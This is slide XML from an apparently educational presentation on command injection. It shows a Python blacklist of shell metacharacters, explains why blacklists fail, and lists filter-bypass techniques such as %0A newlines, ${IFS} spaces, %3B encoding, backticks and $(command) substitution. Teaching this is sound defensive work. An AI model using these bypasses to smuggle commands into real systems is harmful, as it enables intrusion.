          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The Blacklist Approach</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709493" y="6115526"/>
            <a:ext cx="6358414" cy="1277064"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699373" y="6115526"/>
            <a:ext cx="6378654" cy="1277064"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902018" y="6267569"/>
            <a:ext cx="5973366" cy="972979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>blacklist = ['&amp;', ';', '|', '`', '$', '(', ')']if any(char in ip_address for char in blacklist):    # Blocked!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570113" y="5570815"/>
            <a:ext cx="2534126" cy="316706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why Blacklists Fail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570113" y="6090166"/>
            <a:ext cx="6358414" cy="324326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Impossible to anticipate all bypass techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570113" y="6485334"/>
            <a:ext cx="6358414" cy="324326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Requires constant maintenance and updates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570113" y="6880503"/>
            <a:ext cx="6358414" cy="324326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attackers always find creative workarounds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7570113" y="7275671"/>
            <a:ext cx="6358414" cy="324326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>One missed character breaks the entire defense</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36019" y="421124"/>
            <a:ext cx="6291382" cy="478631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Common Filter Bypass Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="960953"/>
            <a:ext cx="3630573" cy="287060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Clever Ways Around the Blacklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="1477685"/>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5" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="1500545"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="1798082"/>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1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="1653659"/>
            <a:ext cx="1914287"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Alternate Separators</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="1984772"/>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Newline characters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>), backticks, or shell-specific syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="2558772"/>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10" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="2581632"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="2879169"/>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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="2734747"/>
            <a:ext cx="2066211"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Command Obfuscation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="3065859"/>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Environment variables like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$IFS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> for space, globbing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, variable expansion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="3639860"/>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15" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="3662720"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="3960257"/>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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="3815834"/>
            <a:ext cx="1962031"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Encoding Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="4146947"/>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URL encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>%3B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> for ;), Base64 encoding if decoded by the application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="4720947"/>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20" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="4743807"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="5041344"/>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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="4896922"/>
            <a:ext cx="1914287"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Alternative Syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="5228034"/>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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$(command)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, backticks, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>foo || command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> constructs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536019" y="5802035"/>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25" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558879" y="5824895"/>
            <a:ext cx="612577" cy="882253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750332" y="6122432"/>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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="5978009"/>
            <a:ext cx="1914287"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Whitespace Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1324570" y="6309122"/>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Replacing spaces with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>${IFS}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> or tab characters to evade detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
